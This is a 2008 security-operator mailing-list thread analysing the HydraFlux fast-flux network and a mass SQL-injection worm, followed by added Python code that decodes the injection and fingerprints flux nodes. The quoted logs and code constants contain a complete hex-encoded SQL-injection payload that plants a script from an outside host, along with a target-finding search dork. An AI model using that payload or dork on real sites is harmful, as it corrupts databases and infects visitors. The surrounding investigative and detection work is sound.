[nsp-sec] HydraFlux is wootyful delicious - Re: rundll841.com wwwDOTwin496.com wwwDOTtag58.com err68.com and sysid72.com sqlinjection sites.
Chris Morrow
morrowc at ops-netman.net
Mon Jun 9 22:34:26 EDT 2008
On Mon, 9 Jun 2008, William Salusky wrote:
> ----------- nsp-security Confidential --------
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Ah yes. forum_asp.php is the polling URI that commands/triggers the
> mass sql injection propagation vector. You've gotta love the full life
> cycle maliciousness involved in HydraFlux.
>
> begin: exploit servers
> to get more eyeballs
> to compromise more clients
> to serve more traffic
> to send more spam
> to get more eyeballs
> to compromise new clients
> to sql inject new servers
> goto begin
>
>
>
> Mr. <aol>calling you a bum</aol> Morrow, you will want to pass the
> following off to Niels. </theOfficialAOL-metoo>
<snausages>Niels might read this email... but the folks
internally watching (and answering) search queries (we have
lots of folks reading your queries so we can provide answers
FAST!) apparently already know about this one and are poking
at it for a fix...</snausages>
thanks though! (as always, more info is better...)
-Chris
google-search-response-guy-#312312
>
> xp2-58 - - [05/Jun/2008:14:01:24 -0700] "POST http://66.199.241.98/forum_asp.php HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=0 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=800 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=600 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=900 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=300 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=400 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=700 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=500 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=100 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=200 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "POST http://66.197.233.133/forum_asp.php HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
>
>
> Followed shortly thereafter by downstream sql injection madness of the
> following...
>
>
> xp2-58 - - [05/Jun/2008:14:01:38 -0700] "GET
> http://www.essentielles.net/communaute/public/forums/forumdetail.asp?
> s=500&fid=28&pagecur=288;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535
> 292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420
> 612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D62
> 2E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E7874
> 7970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D
> 205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E204558
> 45432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E564552542856415243484152283430
> 3030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E72756E646C6C3834312E636F6D2F622E6A
> 733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432045
> 4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000))
> ;EXEC(@S);-- HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0;
> Windows NT 5.1; .NET CLR 2.0.50727)"
>
>
>
> White, Gerard wrote:
> | Bonus Info:
> |
> | Two major incarnations on the go:
> |
> | FIRST INCARNATION:
> | POST /forum_asp.php HTTP/1.1
> | ...
> | Content-Type: multipart/form-data; boundary=FiElDBoUnDaRy
> |
> | SECOND INCARNATION:
> | POST /forum.php HTTP/1.1
> | ...
> | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
> |
> |
> | Most Excellent Post, Mr. Salusky...
> |
> | GW
> | 855 - Bell Aliant
> |
> |> -----Original Message-----
> |> From: nsp-security-bounces at puck.nether.net
> | [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
> |> William Salusky
> |> Sent: Thursday, June 05, 2008 2:44 PM
> |> To: Smith, Donald
> |> Cc: nsp-security at puck.nether.net
> |> Subject: Re: [nsp-sec] rundll841.com wwwDOTwin496.com wwwDOTtag58.com
> |> err68.com and sysid72.com sqlinjection sites.
> |>
> |> ----------- nsp-security Confidential --------
> |>
> | Hey Don,
> |
> | Responses inline. The short answer == yes, this is HydraFlux.
> |
> | | I assume you checked the IP addresses involved and validated this was
> | | the hydraflux net?
> |
> | The IP addresses I've listed are involved as the upstream motherships
> | themselves and management/monitoring nodes, they are not fluxnode
> | endpoints themselves. You would not see any subset of those IPs
> | advertised as A or NS records for any of the active flux domains.
> |
> | | I assume this is in the drive-by category. Does that imply the sql
> | | injection team has leased a portion of the hydra-flux network?
> |
> | I can't say with authority that any of the content types being serviced
> | by this particular flux net is a leasing/rental arrangement, but the
> | varying M.O.s involved in content delivery seem to suggest that a
> | leasing of flux services is involved. If you consider the overall
> | design, management and dynamic reconfiguration capabilities of this
> | fluxnet, it would be *criminally* underutilized if it were not
> | specifically purposed to service the larger miscreant community. :/
> |
> | | I have not run a netflow report on the fast fluxed hosting addresses
> | | but it might be interesting to see whom they are talking to besides
> | | port 80.
> |
> | If you do run flow for endpoints transiting your networks, you should
> | see both TCP 80 (config checks) and TCP 4449 (flux content redirection)
> | to the upstream motherships that are listed on the HydraFlux page. The
> | most direct approach in flow reporting would be to pull flow solely for
> | the mothership IPs. Perhaps you might find some interesting interactive
> | control channels worthy of sharing. ;)
> |
> | Here's the active mothership list to shortcut your flow reporting needs!
> | 'host 203.117.170.42 or host 216.150.79.226 or host 64.191.14.85 or host
> | 64.191.39.85 or host 66.197.168.5 or host 66.197.216.229 or host
> | 66.197.233.133 or host 66.199.241.98 or host 66.232.102.169'
> |
> |
> | Looking at the round-robin on rundll841.com:
> |
> | rundll841.com. 600 IN A 87.205.169.60
> | rundll841.com. 600 IN A 79.185.9.66
> | rundll841.com. 600 IN A 82.143.130.48
> | rundll841.com. 600 IN A 84.121.222.104
> | rundll841.com. 600 IN A 83.8.41.4
> | rundll841.com. 600 IN A 77.91.20.173
> | rundll841.com. 600 IN A 83.242.74.153
> | rundll841.com. 600 IN A 156.17.227.155
> | rundll841.com. 600 IN A 85.60.114.1
> | rundll841.com. 600 IN A 83.11.157.206
> | rundll841.com. 600 IN A 78.92.72.81
> | rundll841.com. 600 IN A 12.207.206.75
> | rundll841.com. 600 IN A 83.24.137.250
> | rundll841.com. 600 IN A 78.130.145.225
> |
> | ;; AUTHORITY SECTION:
> | rundll841.com. 172800 IN NS ns2.rundll841.com.
> | rundll841.com. 172800 IN NS ns3.rundll841.com.
> | rundll841.com. 172800 IN NS ns1.rundll841.com.
> | rundll841.com. 172800 IN NS ns4.rundll841.com.
> |
> |
> | You can fingerprint the HTTP redirect behavior of any live fluxnodes
> | demonstrating the same nginx version, 'ETag' hash, last modified
> | date/etc... (do this based on content known to be actively served in
> | this fluxnet... details.aspx is phish related)
> |
> | $ HEAD http://84.121.222.104/details.aspx
> | 200 OK
> | Connection: close
> | Date: Sun, 06 May 2007 02:43:05 GMT
> | Accept-Ranges: bytes
> | ETag: "108140-1f6b-44dcc616c5780"
> | Server: nginx/0.6.31
> | Content-Length: 8043
> | Content-Type: text/html; charset=UTF-8
> | Last-Modified: Thu, 22 May 2008 07:08:30 GMT
> | Client-Date: Thu, 05 Jun 2008 16:52:00 GMT
> | Client-Peer: 84.121.222.104:80
> | Client-Response-Num: 1
> |
> | $ HEAD http://87.205.169.60/details.aspx
> | 200 OK
> | Connection: close
> | Date: Sun, 06 May 2007 02:38:44 GMT
> | Accept-Ranges: bytes
> | ETag: "108140-1f6b-44dcc616c5780"
> | Server: nginx/0.6.31
> | Content-Length: 8043
> | Content-Type: text/html; charset=UTF-8
> | Last-Modified: Thu, 22 May 2008 07:08:30 GMT
> | Client-Date: Thu, 05 Jun 2008 16:47:39 GMT
> | Client-Peer: 87.205.169.60:80
> | Client-Response-Num: 1
> |
> |
> | Worth noting is that the nginx server version reports differently when
> | checking against the base index versus actual URI paths configured in
> | the <hls> section for redirection to the motherships determined by the
> | <s> config chunk. If I get a chance to confirm I will, but the generic
> | nginx/0.5.33 Server: value may simply be built into the fluxnode client
> | for responses to default content paths that are NOT configured in the
> | <hls> config section.
> |
> | $ HEAD 87.205.169.60
> | 200 OK
> | Connection: close
> | Date: Thu, 05 Jun 2008 16:37:21 GMT
> | Accept-Ranges: bytes
> | ETag: "10816a-5d-44e691ba25a40"
> | Server: nginx/0.5.33
> | Content-Length: 93
> | Content-Type: text/html; charset=UTF-8
> | Last-Modified: Fri, 30 May 2008 02:07:29 GMT
> | Client-Date: Thu, 05 Jun 2008 16:38:10 GMT
> | Client-Peer: 87.205.169.60:80
> | Client-Response-Num: 1
> |
> | $ HEAD 79.185.9.66
> | 200 OK
> | Connection: close
> | Date: Thu, 05 Jun 2008 09:41:51 GMT
> | Accept-Ranges: bytes
> | ETag: "10816a-5d-44e691ba25a40"
> | Server: nginx/0.5.33
> | Content-Length: 93
> | Content-Type: text/html; charset=UTF-8
> | Last-Modified: Fri, 30 May 2008 02:07:29 GMT
> | Client-Date: Thu, 05 Jun 2008 16:38:21 GMT
> | Client-Peer: 79.185.9.66:80
> | Client-Response-Num: 1
> |
> |
> | If you dig against any of the NS records, you see consistent delivery...
> | ;; ANSWER SECTION:
> | ns2.rundll841.com. 600 IN A 66.233.229.99
> | ns2.rundll841.com. 600 IN A 86.16.211.245
> | ns2.rundll841.com. 600 IN A 62.121.110.4
> | ns2.rundll841.com. 600 IN A 68.202.106.222
> | ns2.rundll841.com. 600 IN A 77.253.254.126
> | ns2.rundll841.com. 600 IN A 217.28.146.253
> | ns2.rundll841.com. 600 IN A 75.137.93.12
> | ns2.rundll841.com. 600 IN A 71.59.102.113
> | ns2.rundll841.com. 600 IN A 79.184.58.105
> | ns2.rundll841.com. 600 IN A 172.170.167.178 <- Heh!
> | ns2.rundll841.com. 600 IN A 89.228.212.197
> |
> |
> | You can fingerprint HydraFlux's wildcard DNS behavior through *any* of
> | the fluxnode endpoints regardless of whether they are advertised solely
> | as the A record or NS auth record round-robin, or not advertised at ALL
> | but are known entities from recent history of dns monitoring that you
> | might have in place.
> |
> | 'blah.poop.com' is NOT a flux domain, but as you see by this arbitrary
> | request issued to one of the flux node endpoints, they service any
> | inbound NS request as dictated by the last fluxnode forum.php config
> | update defined in the <d_n> section.
> |
> | $ dig blah.poop.com @66.233.229.99
> |
> | ; <<>> DiG 9.2.4 <<>> blah.poop.com @66.233.229.99
> | ; (1 server found)
> | ;; global options: printcmd
> | ;; Got answer:
> | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49504
> | ;; flags: qr aa rd; QUERY: 1, ANSWER: 15, AUTHORITY: 0, ADDITIONAL: 0
> |
> | ;; QUESTION SECTION:
> | ;blah.poop.com. IN A
> |
> | ;; ANSWER SECTION:
> | blah.poop.com. 600 IN A 79.185.9.66
> | blah.poop.com. 600 IN A 99.194.80.27
> | blah.poop.com. 600 IN A 76.97.50.172
> | blah.poop.com. 600 IN A 78.92.72.81
> | blah.poop.com. 600 IN A 83.242.74.153
> | blah.poop.com. 600 IN A 83.11.157.206
> | blah.poop.com. 600 IN A 79.184.189.79
> | blah.poop.com. 600 IN A 91.192.58.61
> | blah.poop.com. 600 IN A 78.130.145.225
> | blah.poop.com. 600 IN A 82.143.130.48
> | blah.poop.com. 600 IN A 156.17.227.155
> | blah.poop.com. 600 IN A 84.121.222.104
> | blah.poop.com. 600 IN A 77.91.20.173
> | blah.poop.com. 600 IN A 83.8.41.4
> | blah.poop.com. 600 IN A 83.24.137.250
> |
> | ;; Query time: 67 msec
> | ;; SERVER: 66.233.229.99#53(66.233.229.99)
> | ;; WHEN: Thu Jun 5 09:40:24 2008
> | ;; MSG SIZE rcvd: 271
> |
> |
> |
> |
> |
> |
> |>
> |>
> | _______________________________________________
> | nsp-security mailing list
> | nsp-security at puck.nether.net
> | https://puck.nether.net/mailman/listinfo/nsp-security
> |
> | Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> | community. Confidentiality is essential for effective Internet security
> | counter-measures.
> | _______________________________________________
> --
>
> William Salusky
> william.salusky at aol.net
> Sr. Technical Security Investigator - AOL Operations Security
> 703-265-4924 (desk)
> 703-201-8873 (cell)
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.5 (Cygwin)
>
> iD8DBQFITeT/Xyx2ON3+G40RAkkgAJ4qwEJI78xN5vUBqTLHPox9EI/qkwCgk8Qa
> SI44puE+T8IcBMwyedThO2w=
> =SXhp
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
>
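The proxy lines and the hex-encoded CAST() statement quoted above are the HydraFlux loop in miniature: the bot POSTs to forum_asp.php on a mothership to pick up work, runs a search-engine dork for injectable .asp pages, then fires the injection at each hit. What follows is an added example, not code from the thread or from any of its authors. It decodes the CAST(0x...) body back into the T-SQL the attacker hid from query-string keyword filters, pulls out the script URL the cursor appends to every text column, and tags proxy-log lines with the stage they belong to. The sample log lines are constructed to match the shape of the lines quoted above (the hex string is the one quoted, re-joined across the mail wrap); the tag names, regexes and the NVARCHAR handling are this example's choices, not anything from the thread.

```python
"""Decode and classify HydraFlux/ASP mass-SQL-injection traffic.

Added example; not code from the thread.  The log lines below are constructed
to match the shape of the proxy lines in the post (one request per line).
"""
import re
from urllib.parse import unquote

# Hex CAST() body exactly as it appears in the injected URL in the thread,
# re-joined across the mail wrap.
_HEX = (
    "4445434C415245204054205641524348415228323535"
    "292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420"
    "612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D62"
    "2E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E7874"
    "7970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D"
    "205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E204558"
    "45432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E564552542856415243484152283430"
    "3030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E72756E646C6C3834312E636F6D2F622E6A"
    "733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432045"
    "4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220"
)

# Constructed sample lines in the same format as the page's proxy log (unwrapped).
_UA = '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"'
LOG_C2_POLL = ('xp2-58 - - [05/Jun/2008:14:01:24 -0700] "POST http://66.199.241.98/forum_asp.php '
               'HTTP/1.1" - - "-" ' + _UA)
LOG_DORK = ('xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET http://www.google.com/search?hl=en&num=100'
            '&ft=i&as_qdr=all&as_occt=any&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6'
            '&start=0 HTTP/1.1" - - "-" ' + _UA)
LOG_SQLI = ('xp2-58 - - [05/Jun/2008:14:01:38 -0700] "GET http://www.essentielles.net/communaute/'
            'public/forums/forumdetail.asp?s=500&fid=28&pagecur=288;DECLARE%20@S%20VARCHAR(4000);'
            'SET%20@S=CAST(0x' + _HEX + '%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" - - "-" ' + _UA)
LOG_BENIGN = ('xp2-58 - - [05/Jun/2008:14:02:00 -0700] "GET http://www.example.com/forums/'
              'forumdetail.asp?fid=28 HTTP/1.1" - - "-" ' + _UA)

_CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.I)
_SCRIPT_RE = re.compile(r"<script\s+src=['\"]?([^'\"\s>]+)", re.I)
_C2_RE = re.compile(r'"POST\s+\S*/forum(?:_asp)?\.php\b')          # mothership work poll
_DORK_RE = re.compile(r"google\.com/search\?.*inurl(?:%3A|:)asp\+inurl(?:%3A|:)b\b", re.I)


def decode_cast_payload(line):
    """Return the T-SQL hidden inside CAST(0x... AS [N]VARCHAR), or None.

    The statement is hex-encoded so that filters looking for 'sysobjects',
    'UPDATE' or '<script' in the query string never see them.  NVARCHAR
    variants carry UTF-16LE text; VARCHAR is single-byte."""
    m = _CAST_RE.search(unquote(line))
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    return raw.decode("utf-16-le" if m.group(2).upper() == "NVARCHAR" else "latin-1")


def extract_script_srcs(sql):
    """URLs of the <script> tags the decoded statement appends to every text column."""
    return _SCRIPT_RE.findall(sql)


def classify(line):
    """Tag a proxy-log line with the HydraFlux lifecycle stage(s) it matches."""
    tags = set()
    if _C2_RE.search(line):
        tags.add("c2_poll")             # bot fetching work from a mothership
    if _DORK_RE.search(line):
        tags.add("target_discovery")    # dork for injectable .asp pages
    sql = decode_cast_payload(line)
    if sql and re.search(r"\bsysobjects\b", sql, re.I) and "UPDATE" in sql.upper():
        tags.add("mass_sqli")           # cursor over every text column, appending a script tag
    return tags


def summarize(lines):
    """Per-line tags plus every injected script URL seen, for quick IR triage."""
    report = {"tags": [classify(l) for l in lines], "script_srcs": set()}
    for l in lines:
        sql = decode_cast_payload(l)
        if sql:
            report["script_srcs"].update(extract_script_srcs(sql))
    return report


if __name__ == "__main__":
    sample = [LOG_C2_POLL, LOG_DORK, LOG_SQLI, LOG_BENIGN]
    r = summarize(sample)
    for line, tags in zip(sample, r["tags"]):
        print(sorted(tags) or ["-"], line[:72])
    print("injected script sources:", sorted(r["script_srcs"]))
```

The point of decoding before matching is that the visible query string contains only `DECLARE`, `CAST(0x...)` and `EXEC(@S)`; everything that identifies the worm (the sysobjects/syscolumns cursor, the UPDATE, the script URL) is only there after the hex is turned back into text, so a web-log rule that keys on those words without decoding will miss it.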
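The dig and HEAD output quoted in the thread gives three independent handles on the fluxnet: a 600-second round-robin of many unrelated IPs, an NS endpoint that answers for a name it does not own with the same pool, and HTTP front-ends that hand back identical ETag/Last-Modified/Content-Length values for one path. The Python below is an added example, not the poster's tooling. It parses dig-style answer sections, scores the round-robin, measures how much of an unrelated name's answer overlaps the known pool, and clusters HEAD fingerprints so that front-ends proxying the same origin fall together. The record sets and HEAD responses are copied from the post (HEAD output abridged to the four headers compared); the thresholds and the /8-spread heuristic are this example's assumptions.

```python
"""Fast-flux triage over the rundll841.com data quoted in the thread.

Added example, not the poster's code.  Record sets and HEAD responses are
copied from the post (HEAD abridged to the headers compared); thresholds and
the /8-spread heuristic are assumptions.
"""
import re

# dig answer section for rundll841.com, as posted (TTL 600, 14 A records).
RUNDLL841_A = """
rundll841.com. 600 IN A 87.205.169.60
rundll841.com. 600 IN A 79.185.9.66
rundll841.com. 600 IN A 82.143.130.48
rundll841.com. 600 IN A 84.121.222.104
rundll841.com. 600 IN A 83.8.41.4
rundll841.com. 600 IN A 77.91.20.173
rundll841.com. 600 IN A 83.242.74.153
rundll841.com. 600 IN A 156.17.227.155
rundll841.com. 600 IN A 85.60.114.1
rundll841.com. 600 IN A 83.11.157.206
rundll841.com. 600 IN A 78.92.72.81
rundll841.com. 600 IN A 12.207.206.75
rundll841.com. 600 IN A 83.24.137.250
rundll841.com. 600 IN A 78.130.145.225
"""
# Answer for a name the fluxnet does not own, asked of one of its NS nodes.
WILDCARD_A = """
blah.poop.com. 600 IN A 79.185.9.66
blah.poop.com. 600 IN A 99.194.80.27
blah.poop.com. 600 IN A 76.97.50.172
blah.poop.com. 600 IN A 78.92.72.81
blah.poop.com. 600 IN A 83.242.74.153
blah.poop.com. 600 IN A 83.11.157.206
blah.poop.com. 600 IN A 79.184.189.79
blah.poop.com. 600 IN A 91.192.58.61
blah.poop.com. 600 IN A 78.130.145.225
blah.poop.com. 600 IN A 82.143.130.48
blah.poop.com. 600 IN A 156.17.227.155
blah.poop.com. 600 IN A 84.121.222.104
blah.poop.com. 600 IN A 77.91.20.173
blah.poop.com. 600 IN A 83.8.41.4
blah.poop.com. 600 IN A 83.24.137.250
"""
# (ip, path) -> abridged HEAD response, as posted.
HEAD_OUTPUTS = {
    ("84.121.222.104", "/details.aspx"): '200 OK\nETag: "108140-1f6b-44dcc616c5780"\nServer: nginx/0.6.31\nContent-Length: 8043\nLast-Modified: Thu, 22 May 2008 07:08:30 GMT',
    ("87.205.169.60", "/details.aspx"): '200 OK\nETag: "108140-1f6b-44dcc616c5780"\nServer: nginx/0.6.31\nContent-Length: 8043\nLast-Modified: Thu, 22 May 2008 07:08:30 GMT',
    ("87.205.169.60", "/"): '200 OK\nETag: "10816a-5d-44e691ba25a40"\nServer: nginx/0.5.33\nContent-Length: 93\nLast-Modified: Fri, 30 May 2008 02:07:29 GMT',
    ("79.185.9.66", "/"): '200 OK\nETag: "10816a-5d-44e691ba25a40"\nServer: nginx/0.5.33\nContent-Length: 93\nLast-Modified: Fri, 30 May 2008 02:07:29 GMT',
}
_RR_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\w+)\s+(\S+)$", re.M)
FP_KEYS = ("server", "etag", "content-length", "last-modified")


def parse_rrs(text):
    """Parse dig-style 'name ttl IN type rdata' lines into (name, ttl, type, rdata)."""
    return [(n, int(ttl), t, r) for n, ttl, t, r in _RR_RE.findall(text)]


def flux_indicators(rrs, max_ttl=600, min_ips=5, min_slash8=5):
    """Score a round-robin: short TTL, many A records, spread over many /8s.
    The /8 spread is a crude stand-in for 'many different access networks';
    an ASN lookup would be the real check.  Thresholds are assumptions."""
    a = [(ttl, r) for _, ttl, t, r in rrs if t == "A"]
    ips = {r for _, r in a}
    ttl_max = max((ttl for ttl, _ in a), default=None)
    slash8 = {ip.split(".")[0] for ip in ips}
    checks = (ttl_max is not None and ttl_max <= max_ttl,
              len(ips) >= min_ips, len(slash8) >= min_slash8)
    return {"ips": len(ips), "ttl_max": ttl_max, "slash8": len(slash8),
            "fast_flux": all(checks)}


def wildcard_overlap(flux_rrs, probe_rrs):
    """(shared, probe_size): how many IPs answered for an unrelated name are
    already known flux nodes.  Near-total overlap means the NS endpoint serves
    its current pool for any question, i.e. wildcard DNS."""
    known = {r for _, _, t, r in flux_rrs if t == "A"}
    probe = {r for _, _, t, r in probe_rrs if t == "A"}
    return len(known & probe), len(probe)


def parse_head(text):
    """Split a HEAD transcript into (status line, {lower-cased header: value})."""
    status, *rest = text.strip().splitlines()
    pairs = dict(l.split(":", 1) for l in rest if ":" in l)
    return status, {k.strip().lower(): v.strip() for k, v in pairs.items()}


def cluster_nodes(head_outputs):
    """Group endpoints whose replies share Server/ETag/Content-Length/Last-Modified.
    Distinct IPs returning one ETag and mtime for a path are fronting one origin."""
    clusters = {}
    for key, text in head_outputs.items():
        _, h = parse_head(text)
        clusters.setdefault(tuple(h.get(k) for k in FP_KEYS), []).append(key)
    return {fp: sorted(members) for fp, members in clusters.items()}


if __name__ == "__main__":
    rr = parse_rrs(RUNDLL841_A)
    print("flux indicators:", flux_indicators(rr))
    print("wildcard overlap (shared, probe):", wildcard_overlap(rr, parse_rrs(WILDCARD_A)))
    for fp, members in cluster_nodes(HEAD_OUTPUTS).items():
        print(fp, "->", members)
```

On the page's data the round-robin trips all three indicators (14 IPs, TTL 600, ten different /8s), 11 of the 15 addresses returned for blah.poop.com are already in the rundll841.com pool, and the four HEAD transcripts collapse into exactly two fingerprints: one for details.aspx on both nodes and one for the index page on both. To run it against live nodes, replace the embedded strings with the output of `dig` and `HEAD`; the functions do not care where the text came from.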